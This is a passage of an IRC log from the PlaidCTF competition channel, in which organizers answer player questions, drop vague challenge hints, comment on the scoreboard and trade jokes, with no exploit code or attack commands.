  8084. (10:12:00) (+frozencemetery) ryan-c: yes it does; it's in the corner
  8085. (10:12:09) ••• pArt: (16WAAD65R) ([email protected])
  8086. (10:12:35) (ryan-c) frozencemetery: of the square? that shows zero
  8087. (10:12:55) (+frozencemetery) uh
  8088. (10:12:57) (+frozencemetery) no it doesn't
  8089. (10:12:57) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 258 seconds
  8090. (10:12:58) ••• qUit: (Hertz__) ([email protected])
  8091. (10:12:59) (+frozencemetery) bottom left; 4
  8092. (10:13:07) ••• jOin: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35)
  8093. (10:13:09) • ryan-c mashed f5
  8094. (10:13:28) (ciliated) i have question about parlor, does "md5(our number + your number)" means "md5(concat(str(our number), str(your number)))"?
  8095. (10:13:32) (wheee) uh are there any hints for tenement
  8096. (10:13:34) ••• jOin: (cool_guy) ([email protected])
  8097. (10:13:41) (+tylerni7) ciliated: what's up
  8098. (10:13:48) (+tylerni7) you can check it by hand?
  8099. (10:13:49) (ryan-c) frozencemetery: bottom left is showing zero for me
  8100. (10:13:55) (+tylerni7) I mean.. it'll give you the server nonce
  8101. (10:14:06) (+frozencemetery) ryan-c: you should probably refresh the gameboard
  8102. (10:14:07) • tokki is drooling over keyboard
  8103. (10:14:24) (+frozencemetery) ciliated: you may have to provide an additional newline beyond what you expect
  8104. (10:14:51) (HENLEYbls) grrr the multiplication one is bugging me lol
  8105. (10:15:07) (ryan-c) frozencemetery: i just did refresh it
  8106. (10:15:30) ••• jOin: (chrissing) ([email protected])
  8107. (10:15:39) (+frozencemetery) sorry, wrong problem. It is zero.
  8108. (10:15:45) ••• jOin: (alexwebr) ([email protected])
  8109. (10:15:48) (alexwebr) o/
  8110. (10:15:49) (stypr) oh god
  8111. (10:15:53) (stypr) I am exhausted
  8112. (10:15:55) (|x_x|) rofl
  8113. (10:15:56) (|x_x|) oh god.
  8114. (10:15:59) (stypr) after that internet bill problem
  8115. (10:16:05) (|x_x|) I finally got Multiplication is Hard.
  8116. (10:16:08) (|x_x|) That's hillarious.
  8117. (10:16:16) (stypr) yeah. it was something random
  8118. (10:16:23) ••• jOin: (Hertz__) ([email protected])
  8119. (10:16:23) (stypr) maybe it's too obvious
  8120. (10:16:29) (|x_x|) Not random, but it was rather brilliant in a way.
  8121. (10:16:30) (stypr) Hertz__
  8122. (10:16:32) (stypr) sup
  8123. (10:16:35) (ciliated) +tylerni7: so md5(concat(hex(our number), hex(your number))) is right?
  8124. (10:16:42) (ryan-c) frozencemetery: yeah, the newline got me
  8125. (10:16:45) (ryan-c) ciliated: no
  8126. (10:16:54) (+tylerni7) ciliated: try a few things and see?
  8127. (10:17:07) (ryan-c) ciliated: if it works your answer will match up
  8128. (10:17:08) (iZsh) wtf
  8129. (10:17:13) (iZsh) are you really talking in public?
  8130. (10:17:40) (+tylerni7) iZsh: it says in the problem that it's md5(our number + your number)
  8131. (10:17:43) (ciliated) ok, its my misunderstanding
  8132. (10:17:51) (+tylerni7) so it's not giving any new info
  8133. (10:17:59) (ryan-c) <frozencemetery> ciliated: you may have to provide an additional newline beyond what you expect
  8134. (10:18:38) ••• jOin: (nofiki1) ([email protected])
  8135. (10:19:05) (ryan-c) also, if the vuln in parlor is what i think it is, it's pretty epic
  8136. (10:19:18) (_blasty_) LOL MONEY, MONEY LOL
  8137. (10:19:37) (ryan-c) tylerni7: was it another of your masterpieces?
  8138. (10:20:07) (+tylerni7) yeah parlor is mine as well
  8139. (10:20:09) (+mserrano) lol
  8140. (10:20:15) • +ricky wakes up
  8141. (10:20:27) ••• qUit: (Hertz__) ([email protected]) Client Quit
  8142. (10:20:30) (+tylerni7) imma fix it so when you connect it'll tell you it includes the newline
  8143. (10:20:32) ••• jOin: (l0l0l) (dd94627a@gateway/web/freenode/ip.221.148.98.122)
  8144. (10:20:44) (+ricky) _blasty_: solve bronies yet? :-) Don't ignore it just because it's web
  8145. (10:21:00) (+tylerni7) ooo 0xffa back in first
  8146. (10:21:04) (+ricky) Wow, tight game
  8147. (10:21:07) (+tylerni7) this is getting interesting now :O
  8148. (10:21:13) (+ricky) Congrats 0xffa
  8149. (10:21:15) (_blasty_) LOL MONEY MONEY LOL
  8150. (10:21:44) (+dickoff) _blasty_: I love that youtube video
  8151. (10:21:46) ••• qUit: (shhdup) ([email protected]) Read error: Connection reset by peer
  8152. (10:21:51) (_blasty_) dickoff: :D
  8153. (10:22:01) ••• jOin: (pez) ([email protected])
  8154. (10:22:28) (+tylerni7) parlor text updated when you connect :)
  8155. (10:22:37) (+tylerni7) sorry for that :(
  8156. (10:22:50) (ryan-c) tylerni7: It wasn't *too* hard to figure out.
  8157. (10:23:28) (positron_) plz hints for kpop
  8158. (10:23:43) (+tylerni7) ryan-c: yeah, it was unintended though :(
  8159. (10:24:25) ••• qUit: (ccmndhd) ([email protected]) Quit: This computer has gone to sleep
  8160. (10:25:10) (ryan-c) tylerni7: Yeah, I was guessing it was. I found it and mentioned it to whoever was awake last night.
  8161. (10:25:28) ••• jOin: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60)
  8162. (10:25:31) (+mserrano) hi ricky
  8163. (10:25:37) (+tylerni7) yeah, they didn't want to touch the server because it broke a very fragile checker script
  8164. (10:25:42) (positron_) kpop uses file write?
  8165. (10:25:48) (+tylerni7) (we have solutions we periodically throw at problems to make sure they are working)
  8166. (10:25:50) ••• qUit: (nofiki1) ([email protected]) Quit: Leaving.
  8167. (10:25:53) (+tylerni7) anyway
  8168. (10:25:59) (+tylerni7) hopefully it's more clear when you connect now
  8169. (10:25:59) (ryan-c) I'm trying to decide how much to bother automating a solution
  8170. (10:26:12) (+mserrano) positron: you have no write permissions anywhere interesting
  8171. (10:26:20) (iZsh) anyone about bbox?
  8172. (10:26:44) (+tylerni7) iZsh: hmm.. I know a tiny bit about it
  8173. (10:26:57) (+tylerni7) you can pm me for now... clockish or awesie know more
  8174. (10:27:05) (+tylerni7) one of them will be around in a little bit
  8175. (10:27:48) (positron_) +mserrano: i see
  8176. (10:28:51) ••• jOin: (sigsegv_) (7ab35ee7@gateway/web/freenode/ip.122.179.94.231)
  8177. (10:29:32) ••• jOin: (ccmndhd) ([email protected])
  8178. (10:29:46) ••• jOin: (himanshu_) (1b22f3ba@gateway/web/freenode/ip.27.34.243.186)
  8179. (10:31:18) ••• jOin: (nofiki1) ([email protected])
  8180. (10:32:14) ••• jOin: (slimmer) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
  8181. (10:33:59) ••• qUit: (nofiki1) ([email protected]) Client Quit
  8182. (10:36:15) ••• pArt: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
  8183. (10:36:59) ••• jOin: (trelgak) ([email protected])
  8184. (10:37:55) ••• qUit: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35) Quit: Page closed
  8185. (10:38:20) ••• qUit: (Dr_Dinosaur) ([email protected]) Ping timeout: 245 seconds
  8186. (10:38:47) (factoreal) who working on web_200 reekee?
  8187. (10:38:48) (geobot) we won't be working hard to deny we have nfc phones
  8188. (10:39:10) (_blasty_) w3 g0t th3 pr0duktttt
  8189. (10:39:28) ••• jOin: (Alii) ([email protected])
  8190. (10:39:34) ••• qUit: (Alii) ([email protected]) Remote host closed the connection
  8191. (10:39:45) (ryan-c) _blasty_: https://www.youtube.com/watch?v=LkEsP9H2HGM
  8192. (10:40:00) ••• jOin: (Alii) ([email protected])
  8193. (10:40:01) (ryan-c) https://www.youtube.com/watch?v=1dcrV_7JpXQ actually
  8194. (10:40:18) ••• jOin: (rickroll_) (4ac33e6f@gateway/web/freenode/ip.74.195.62.111)
  8195. (10:40:33) (_blasty_) ryan-c: I like the popular demo :-) and poem to a horse of course :-)
  8196. (10:41:12) (rickroll_) hi, anybody willing to help with last part of ezhp? stuck hard, and I just want to confirm I'm not way off course.
  8197. (10:41:12) (geobot) hi, we're legitimate business syndicate
  8198. (10:41:24) ••• qUit: (snoopybbt) ([email protected]) Quit: Leaving.
  8199. (10:42:18) (+frozencemetery) geobot++
  8200. (10:43:25) (ryan-c) geobot: orly
  8201. (10:43:58) (+ricky) Woo, 0xffa solidifies their first place with bronies 1
  8202. (10:44:06) (+ricky) Still wonder if anybody's planning on getting part 2 :-)
  8203. (10:44:56) (ryan-c) ricky: not worth dropping my 0days on it :/
  8204. (10:45:14) ••• jOin: (ggis) ([email protected])
  8205. (10:45:31) • +ricky wonders if tomcr00se is going for bronies 2
  8206. (10:45:35) (+ricky) ryan-c: No 0days required
  8207. (10:45:52) (+mserrano) :)
  8208. (10:46:26) (ryan-c) ricky: yeah, but figuring out how to do it the right way is too much work
  8209. (10:46:46) (+mserrano) it's not *that* bad
  8210. (10:46:50) (+mserrano) it's actually an amazing problem
  8211. (10:46:53) (+mserrano) I give it 10/10
  8212. (10:46:54) (Ymgve) wtf bbos
  8213. (10:46:57) (ryan-c) hopefully there will be writeups
  8214. (10:47:05) (+mserrano) not unless someone solves it!
  8215. (10:47:14) (+ricky) I'm expecting writeups on part 1, less sure about part 2
  8216. (10:47:35) (+cai_) teams will need to submit their writeups in order to claim prize
  8217. (10:47:38) (ryan-c) well, i'm working on parlor, because i know i can get it
  8218. (10:47:48) ••• jOin: (Hertz__) ([email protected])
  8219. (10:47:49) (+ricky) Would be nice if somebody got part 2 - we decided to be kind of nice on part 2 since there wasn't that much time left
  8220. (10:47:59) (+ricky) Well kind of
  8221. (10:48:31) ••• qUit: (factoreal) ([email protected]) Quit: Leaving.
  8222. (10:48:58) (ryan-c) i'm curious how many people solved rsa the intended way
  8223. (10:49:24) ••• qUit: (ylujion) ([email protected]) Ping timeout: 250 seconds
  8224. (10:50:05) ••• qUit: (Beched) (6dbc7f66@gateway/web/freenode/ip.109.188.127.102) Ping timeout: 240 seconds
  8225. (10:50:27) ••• jOin: (ylujion) ([email protected])
  8226. (10:50:31) (iZsh) ricky: just be careful not to give hints while wanting to have ppl solve it pls ):
  8227. (10:50:33) (iZsh) :)
  8228. (10:50:40) (+mserrano) :P
  8229. (10:50:42) ••• jOin: (muchacho) ([email protected])
  8230. (10:50:47) (+ricky) No hints, just ample encouragement
  8231. (10:50:52) ••• qUit: (mascot) ([email protected]) Quit: Leaving.
  8232. (10:50:56) (iZsh) easy to get SE'ing ;-)
  8233. (10:51:01) (+tylerni7) hint: get teh flage
  8234. (10:51:10) (+mserrano) hint: teh flage is not poop
  8235. (10:51:15) (ryan-c) Teh flage u say?
  8236. (10:51:16) (geobot) did tyler say?
  8237. (10:51:16) (+tylerni7) mserrano: it might be
  8238. (10:51:20) (ryan-c) I have to... get it?
  8239. (10:51:26) (+mserrano) yes
  8240. (10:51:30) (ryan-c) I see. Thank you!
  8241. (10:51:31) (+frozencemetery) geobot: u wot m8
  8242. (10:51:33) (+tylerni7) mserrano: stop giving away hints
  8243. (10:51:33) (geobot) giving your mail clients, we don't you like playfair ciphers
  8244. (10:51:34) ••• qUit: (ggis) ([email protected]) Ping timeout: 250 seconds
  8245. (10:51:46) (sven) can i pm someone about freya?
  8246. (10:52:12) (+tylerni7) sven: frozencemetery
  8247. (10:52:22) (+frozencemetery) sven: hit me
  8248. (10:52:31) (AnthraX101) Can I pm someone about this rash?
  8249. (10:52:39) (+tylerni7) AnthraX101: the_doctor
  8250. (10:52:39) (+mserrano) AnthraX101: yes, a doctor
  8251. (10:52:43) (+mserrano) efb
  8252. (10:52:46) (AnthraX101) hivemind.
  8253. (10:52:54) (+tylerni7) AnthraX101: or ricky
  8254. (10:52:55) (+frozencemetery) M-x doctor
  8255. (10:52:56) ••• jOin: (Frisk0) (~Frisk0@2601:7:9e00:8f:249e:c110:e2b2:2c60)
  8256. (10:53:09) (+ricky) I think tylerni7's closer to being a Dr than me
  8257. (10:53:10) (+mserrano) Make sure to ask ricky how you can repay him in cheese
  8258. (10:53:17) (+tylerni7) ricky: not sure about that
  8259. (10:53:20) ••• jOin: (daniel) ([email protected])
  8260. (10:53:41) ••• nIck: (daniel) is now known as (Guest71506)
  8261. (10:54:05) (Guest71506) hi, anyone I could talk to regarding the tor chal?
  8262. (10:54:19) (+tylerni7) Guest71506: you can talk to me tiny bit
  8263. (10:54:26) (+tylerni7) houqp knows more, but I think he's asleep
  8264. (10:55:18) ••• jOin: (slimmer_) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
  8265. (10:55:57) ••• jOin: (ZadYree) ([email protected])
  8266. (10:56:35) ••• qUit: (slimmer) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Ping timeout: 240 seconds
  8267. (10:56:51) ••• qUit: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
  8268. (10:57:15) (DonnchaC) Which challange is the Tor challange?
  8269. (10:57:55) (|x_x|) Rendevouz
  8270. (10:57:57) (+mserrano) DonnchaC: rendezvous
  8271. (10:58:23) ••• qUit: (Alii) ([email protected]) Quit: Leaving
  8272. (10:59:26) ••• jOin: (darklapu) ([email protected])
  8273. (10:59:47) ••• qUit: (WuZ) ([email protected]) Ping timeout: 240 seconds
  8274. (10:59:51) (ryan-c) you guys should bump that up 100 points :p
  8275. (11:00:09) (+mserrano) meh
  8276. (11:00:43) (+mserrano) in hindsight many of our point values were a bit off
  8277. (11:00:46) ••• qUit: (gbarboza) (~gbarboza@unaffiliated/sonicvanajr) Quit: mIRC v1.47
  8278. (11:00:49) (+frozencemetery) people have solved it; not fair to bump it now
  8279. (11:00:59) ••• jOin: (gbarboza) (~gbarboza@unaffiliated/sonicvanajr)
  8280. (11:00:59) ••• mOde: (ChanServ) sets (+v gbarboza)
  8281. (11:01:10) ••• jOin: (WuZ) ([email protected])
  8282. (11:01:12) ••• jOin: (nonroot) ([email protected])
  8283. (11:01:40) (asmoday) cattle moooo
  8284. (11:01:47) ••• qUit: (slimmer_) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Quit: Page closed
  8285. (11:02:43) (ryan-c) mserrano: I actually liked the analysis you guys did a few years back that re-computed the rankings based on weighing the values of challanges by number of solves
  8286. (11:02:54) (tokki) ooh
  8287. (11:03:15) • ryan-c stares at parlor
  8288. (11:03:18) (+mserrano) we may look at doing an analysis again
  8289. (11:03:49) (ryan-c) i know how to solve it, but my motivation is still in bed
  8290. (11:03:52) (ryan-c) :|
  8291. (11:03:53) ••• jOin: (BinaryCrystal) ([email protected])
  8292. (11:04:05) ••• jOin: (ggis) ([email protected])
  8293. (11:04:29) (tokki) bronies, brownies
  8294. (11:04:30) (ryan-c) also i think i smell bad from hacking too much and showering too little
  8295. (11:04:38) (tokki) lol
  8296. (11:04:44) (ryan-c) anyone else feel like that?
  8297. (11:05:03) ••• jOin: (Stean) ([email protected])
  8298. (11:05:05) • asmoday waves hand
  8299. (11:05:51) (asmoday) I have forgone the Defcon rules as I am home
  8300. (11:05:57) (n00bz) anyone on web-js?
  8301. (11:05:58) (geobot) is anyone working on zen garden xd
  8302. (11:06:05) (DonnchaC) mserrano: Thanks
  8303. (11:06:06) (ryan-c) defcon has a shower rule?
  8304. (11:06:07) (+tylerni7) geobot: don't think so
  8305. (11:06:07) (geobot) quick, think 3
  8306. (11:06:11) (ryan-c) i never noticed that
  8307. (11:06:11) (+frozencemetery) i,i xen garden
  8308. (11:06:14) (+mserrano) geobot: that ctf was ages ago man
  8309. (11:06:14) (geobot) this channel that does not to sensationalize shit has to run that might be ubuntu/debian with last year it was better than the doses were fixed a few days ago or so?
  8310. (11:06:29) (+tylerni7) doses? you mean heartbleed? that wasn't a dos
  8311. (11:06:30) (chrissing) any hint for zfs?
  8312. (11:06:39) (+frozencemetery) geobot: wait, they fixed the doeses on freenode?
  8313. (11:06:43) (Hertz__) n00bz: me
  8314. (11:06:46) (+mserrano) zfs is a quality filesystem.
  8315. (11:06:56) (+mserrano) it is a helper
  8316. (11:06:59) (chrissing) lol i kne that
  8317. (11:07:01) (+frozencemetery) mserrano: it's quality!
  8318. (11:07:05) (asmoday) cuts like a knife
  8319. (11:07:07) (Xteven) any clues for web800?
  8320. (11:07:13) (ryan-c) ppp d00ds, do you guys do all your challange playtesting in-house?
  8321. (11:07:14) (+mserrano) Xteven: webbbbbbbbbbbbbbbbbbbbb
  8322. (11:07:18) (+mserrano) ryan-c: yes
  8323. (11:07:19) (+frozencemetery) Xteven: shits hard yo
  8324. (11:07:25) (ryan-c) i guess it's not hard given your size :P
  8325. (11:07:35) ••• qUit: (l0l0l) (dd94627a@gateway/web/freenode/ip.221.148.98.122) Quit: Page closed
  8326. (11:07:38) (+tylerni7) ryan-c: how large a team do you think we have?
  8327. (11:07:39) (+tylerni7) :P
  8328. (11:07:44) (+frozencemetery) ryan-c: as in, we lock ourselves in the basement and don't come out until chals are solved
  8329. (11:07:48) (+mserrano) lolwut.
  8330. (11:07:52) (+ricky) Xteven: Try to break into the company portal thing!
  8331. (11:07:54) (DonnchaC) how long is left in the CTF?
  8332. (11:07:55) (ryan-c) haha
  8333. (11:08:02) (ryan-c) DonnchaC: about 5 hours
  8334. (11:08:02) (+frozencemetery) ryan-c: everyone who's been a part of making chals has been voiced in this channel
  8335. (11:08:05) (+mserrano) I mean, we have like weeks to test problems whereas you guys have to do all of them in 48h
  8336. (11:08:05) ••• qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Ping timeout: 240 seconds
  8337. (11:08:07) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  8338. (11:08:08) (+ricky) ryan-c: Yeah, we test each other's problems - sometimes that leads to stuff being undervalued a little
  8339. (11:08:11) ••• jOin: (ronbarrey) ([email protected])
  8340. (11:08:16) (Xteven) ricky: right :P
  8341. (11:08:20) (+tylerni7) heh
  8342. (11:08:37) (ryan-c) don't you guys have a bunch of less dedicated people?
  8343. (11:08:38) (+tylerni7) ricky promises harry potter took him "a few minutes"
  8344. (11:08:50) (+mserrano) ryan-c: yeah, but they don't really work on/test these challenges
  8345. (11:08:52) (+tylerni7) ryan-c: yeah, but they also didn't help with pCTF... too busy with other things :(
  8346. (11:08:58) (+frozencemetery) let us examine the word "dedicated"
  8347. (11:09:02) (+ricky) I changed it to "an hour or so"
  8348. (11:09:05) (ronbarrey) any advice for web150?
  8349. (11:09:18) (+mserrano) ronbarrey: there's a hint on the webpage!
  8350. (11:09:24) (+tylerni7) mserrano: you are the worst
  8351. (11:09:31) (ryan-c) yeah, but some of you SOBs do shit like this: http://security.ece.cmu.edu/aeg/aeg-current.pdf
  8352. (11:09:57) (+tylerni7) ryan-c: I don't think any of us that did pctf are on that paper
  8353. (11:09:59) (+mserrano) yeah
  8354. (11:10:05) (+frozencemetery) nope, that's none of us
  8355. (11:10:27) (ryan-c) also, is tomcr00se seriously just geohot playing by himself?
  8356. (11:10:29) (+mserrano) http://linkyzer0.com/papers/GPS%20Software%20Attacks.pdf on the other hand has tylerni7 written ALL OVER IT
  8357. (11:10:29) (+tylerni7) they helped with the first pctf... but yeah
  8358. (11:10:30) (geobot) could bring them to learn that rtorrent just happy i helped with him after i already
  8359. (11:10:34) (+frozencemetery) ryan-c: yup
  8360. (11:10:47) ••• qUit: (muchacho) ([email protected]) Ping timeout: 252 seconds
  8361. (11:10:50) (+mserrano) ryan-c: yeah
  8362. (11:11:00) • +ricky roots for whatever team is working hardest on bronies
  8363. (11:11:01) (+frozencemetery) geobot: I found the worst rtorrent bug the other day
  8364. (11:11:14) (tokki) oh god those hints, tho
  8365. (11:11:21) (+tylerni7) btw, what do people think of the bronies website?
  8366. (11:11:22) (+tylerni7) :D
  8367. (11:11:25) (+mserrano) tokki: lol
  8368. (11:11:38) (tokki) lol
  8369. (11:11:46) (+tylerni7) lol
  8370. (11:11:58) (ryan-c) tylerni7: fuck your captcha
  8371. (11:12:05) (+ricky) Best captcha ever
  8372. (11:12:13) (+tylerni7) ryan-c: are you not true brony?
  8373. (11:12:21) (ryan-c) tylerni7: i am not
  8374. (11:12:36) (tokki) lol the bronies website is c...cute...?
  8375. (11:12:43) (ryan-c) f5 until one of the two that my girlfriend told me the name of
  8376. (11:12:52) (tokki) :O
  8377. (11:13:15) (+tylerni7) (I am not a brony, fwiw, I think I can identify apple jack and pinkie pie in the captcha)
  8378. (11:13:18) (asmoday) I really hope someone has kids
  8379. (11:13:26) (+ricky) tylerni7: You misspelled Pinkie Pie as Pinky Pie :-P
  8380. (11:13:29) (+tylerni7) oh
  8381. (11:13:31) (+tylerni7) >_>
  8382. (11:13:35) (+tylerni7) I AM NOT TRUE BRONY
  8383. (11:13:36) (+ricky) ^ Might be useful to anybody trying to solve that captcha
  8384. (11:13:43) ••• qUit: (Cimmi) ([email protected]) Ping timeout: 252 seconds
  8385. (11:13:43) (+ricky) I just left it as is to not confused people
  8386. (11:13:58) ••• jOin: (Adran) (adran@botters/staff/adran)
  8387. (11:14:00) (+tylerni7) >.<
  8388. (11:14:01) (+tylerni7) sorry
  8389. (11:14:10) (+tylerni7) we need bronies in our QA process, clearly
  8390. (11:15:07) (haoz) web 150
  8391. (11:15:08) (haoz) ?
  8392. (11:15:20) (+mserrano) web 150
  8393. (11:15:20) (+mserrano) .
  8394. (11:15:22) ••• jOin: (rvpersie) ([email protected])
  8395. (11:15:24) (ronbarrey) mserrano: on hints page?
  8396. (11:15:34) (+mserrano) http://play.plaidctf.com/problems/hints
  8397. (11:15:36) (+frozencemetery) yep, web 155 is certainly a problem alright
  8398. (11:15:40) (+frozencemetery) *150
  8399. (11:15:43) ••• jOin: (c1l0) ([email protected])
  8400. (11:15:52) (+mserrano) next year all our point values should be cmu course numbers
  8401. (11:15:53) (+mserrano) 251
  8402. (11:15:53) (+mserrano) 151
  8403. (11:15:55) (ronbarrey) that's the easy part
  8404. (11:16:08) (+mserrano) 410
  8405. (11:16:09) (ronbarrey) what about the missing asp page?
  8406. (11:16:12) (+frozencemetery) mserrano: yesss
  8407. (11:16:14) (+frozencemetery) D: 410
  8408. (11:16:18) (+mserrano) missing asp page?
  8409. (11:16:57) (sigsegv_) demo_form_action.asp to be precise
  8410. (11:17:05) ••• qUit: (paul_axe) ([email protected]) Quit: WeeChat 0.4.3
  8411. (11:17:08) (Kasalehlia) mserrano: active server pages page?
  8412. (11:17:11) (ryan-c) I've gotten about 1000 points myself and expcet to get another 250, yet he has more than my entire team.
  8413. (11:17:13) (ronbarrey) demo_form_action.asp not found after query
  8414. (11:17:31) (ryan-c) though to be fair we have the reversing skills of a llama
  8415. (11:17:41) (Adran) what
  8416. (11:17:42) (Adran) where'd everyone go?
  8417. (11:17:42) (f00b4r_) does freya server down?
  8418. (11:17:49) (+ricky) haha
  8419. (11:17:50) ••• jOin: (hoge) ([email protected])
  8420. (11:18:01) (+ricky) If dragon sector solves bronies 1, they'll be 1 point behind 0xffa
  8421. (11:18:05) (+frozencemetery) f00b4r_: no, it might be slower than you like though
  8422. (11:18:07) ••• jOin: (lmoro) ([email protected])
  8423. (11:18:14) (+ricky) This might be the first time in pctf history that breakthrough might matter
  8424. (11:18:21) ••• nIck: (lmoro) is now known as (johnCool)
  8425. (11:18:28) ••• qUit: (slinkyman) ([email protected]) Quit: leaving
  8426. (11:19:04) (+mserrano) ronbarrey: lol that has nothing to do with it
  8427. (11:19:06) (+frozencemetery) f00b4r_: I just ran my solution and it's working
  8428. (11:19:09) (+mserrano) it's weird that that's a thing
  8429. (11:19:16) (f00b4r_) frozencemetery: k, thanks
  8430. (11:19:20) (+frozencemetery) np
  8431. (11:19:21) (+frozencemetery) (alternate answers included: yes, but less often than yer mum)
  8432. (11:19:28) (ryan-c) tomcr00se: hey, wanna be on my team? :-D
  8433. (11:19:39) (+frozencemetery) geobot: wanna be on ryan-c's team?
  8434. (11:19:47) (+frozencemetery) (probably too busy hacking)
  8435. (11:19:50) (ryan-c) we have candy
  8436. (11:19:58) (+mserrano) GEOMON GOTTA CATCH EM ALL OH SO TRUEEEEEEE
  8437. (11:19:59) (n00bz) ryan-c, you are from hf?
  8438. (11:20:08) (ryan-c) n00bz: no
  8439. (11:20:46) ••• jOin: (deject3d) ([email protected])
  8440. (11:20:51) (ryan-c) what's hf?
  8441. (11:21:03) (+frozencemetery) high food?
  8442. (11:21:16) (ryan-c) frozencemetery: taco bell?
  8443. (11:21:23) (+frozencemetery) vlc?
  8444. (11:21:34) (mrsmith67) are you guys going to extend the end of the ctf?
  8445. (11:21:35) (asmoday) which company was hiring or recruiting as a sponsor?
  8446. (11:21:39) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  8447. (11:21:53) (+mserrano) asmoday: all of them would like to hire people, I suspect
  8448. (11:21:57) (+tylerni7) mrsmith67: no
  8449. (11:21:57) (ryan-c) endgame, salesforce and accuvant
  8450. (11:22:01) (+cai_) mrsmith67: no, it'll end in time
  8451. (11:22:03) (+cai_) on*
  8452. (11:22:09) (mrsmith67) ok
  8453. (11:22:11) (ryan-c) i am not quite sure why salesforce
  8454. (11:22:13) (dcbz_) accuvant being the best of those 3
  8455. (11:22:15) (dcbz_) ;-)
  8456. (11:22:19) ••• qUit: (delusions) ([email protected]) Quit: delusions
  8457. (11:22:24) (mrsmith67) can i ask someone a quick q about bronies1?
  8458. (11:22:27) (ryan-c) OMG CLOUDS LOL
  8459. (11:22:27) (asmoday) wonder which you might work for haha
  8460. (11:22:30) ••• jOin: (factoreal) ([email protected])
  8461. (11:22:34) (dcbz_) vicious allegations!
  8462. (11:22:36) (dcbz_) :D
  8463. (11:23:01) (+cai_) ryan-c: they have a red team :p
  8464. (11:23:05) ••• jOin: (Hertz) ([email protected])
  8465. (11:23:23) (asmoday) RED TEAM FLORIDA!!!!!
  8466. (11:23:28) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Client Quit
  8467. (11:23:47) ••• jOin: (noregret) (~regret@unaffiliated/noregret)
  8468. (11:23:55) (+tylerni7) ryan-c: I think forbes has ranked them as the most innovative company in the USA last year
  8469. (11:24:18) (asmoday) ok you have convinced me I will join
  8470. (11:24:34) (ryan-c) I'm just kind of suprised they have a dedicated redteam and are looking to expand it
  8471. (11:24:47) ••• jOin: (LouTerrailloune) ([email protected])
  8472. (11:24:59) (+tylerni7) seems reasonable to me *shrug*
  8473. (11:25:37) (ronbarrey) mserrano: so what's the deal with the admin panel?
  8474. (11:25:43) (ryan-c) tylerni7: This view is mostly shaped by some silly XSSs in their platform
  8475. (11:25:48) ••• jOin: (DoctorDelusional) ([email protected])
  8476. (11:25:53) ••• qUit: (Hertz__) ([email protected]) Ping timeout: 276 seconds
  8477. (11:26:03) ••• pArt: (DoctorDelusional) ([email protected])
  8478. (11:26:11) (ryan-c) i really don't know shit
  8479. (11:27:05) (+mserrano) ronbarrey: pretend I set the form action to be admin.php
  8480. (11:27:22) (+tylerni7) lol
  8481. (11:28:27) ••• qUit: (darklapu) ([email protected]) Quit: darklapu
  8482. (11:29:10) (ronbarrey) mserrano: sorry not authorized...
  8483. (11:29:17) (+mserrano) well
  8484. (11:29:21) (+mserrano) figure out how to get authorized ;)
  8485. (11:29:34) (Xteven) mserrano: there is no admin.php
  8486. (11:29:36) (factoreal) who solved g++?
  8487. (11:29:42) (+frozencemetery) ur not admin.php
  8488. (11:29:48) (Xteven) oh ok
  8489. (11:29:55) (|x_x|) Can I be admin.php?
  8490. (11:30:54) (+tylerni7) factoreal: if you have questions on it you can ask me
  8491. (11:31:56) ••• qUit: (rickroll_) (4ac33e6f@gateway/web/freenode/ip.74.195.62.111) Quit: Page closed
  8492. (11:33:10) ••• qUit: (Sliden) ([email protected]) Ping timeout: 250 seconds
  8493. (11:33:34) ••• jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
  8494. (11:33:42) ••• jOin: (DoctorDelusional) ([email protected])
  8495. (11:33:49) (corpille) i hate that admin.php
  8496. (11:35:05) (+cai_) grats Stratum Auhuur for taking the third :)
  8497. (11:35:08) (sigsegv_) can we assume $SECRET is too long to bruteforce?
  8498. (11:35:17) (+mserrano) yes
  8499. (11:35:18) (stypr) no english
  8500. (11:35:38) (stypr) you no english? I no no english
  8501. (11:35:51) (+tylerni7) you all are making the last few hours really exciting on the scoreboard :O
  8502. (11:35:59) (tokki) :D
  8503. (11:36:00) (ronbarrey) mserrano: why is there a hint of ?page=...
  8504. (11:36:02) (+ricky) Useless hint: Oh bronies, prevent_teams_from_stealing_your_xss_payload is *not* part of the challenge, it's an implementation detail
  8505. (11:36:11) (tokki) lol
  8506. (11:36:12) (+ricky) I thought it was obvious from the field name; -/
  8507. (11:36:35) (+tylerni7) -_-
  8508. (11:36:50) ••• jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
  8509. (11:36:59) (Xteven) ricky: is there a hint on how the portal page is visited for bronies1?
  8510. (11:37:00) (geobot) can pm someone a quick q about bronies1?
  8511. (11:37:14) • jduck shakes his fist at intricacies!
  8512. (11:37:16) ••• jOin: (wahwah) ([email protected])
  8513. (11:37:20) (+ricky) geobot: :-P
  8514. (11:37:25) (piroko) tylerni7: Alright, I have been messing with the tor source code for about 10 hours now. I'm memcpy'ing "beef" into the rend_cookie before it's sent to the rendezvous point at src/or/rendclient.c:80
  8515. (11:37:28) (stypr) lol
  8516. (11:37:31) (piroko) shit
  8517. (11:37:33) (tokki) lol I wonder how many times we have gone around the boardgame
  8518. (11:37:36) (+tylerni7) piroko: -_-
  8519. (11:37:38) (+frozencemetery) 8/10 would geobot again
  8520. (11:37:41) (+tylerni7) piroko: you should pm houqp anyway
  8521. (11:37:42) (+tylerni7) not me
  8522. (11:37:48) (+ricky) Xteven: No hint other than "Recon has also revealed that The Plague likes to browse this site during work hours"
  8523. (11:37:49) (geobot) that's why i browse everything with ie8
  8524. (11:37:56) (stypr) i don't know after stealing cooks.
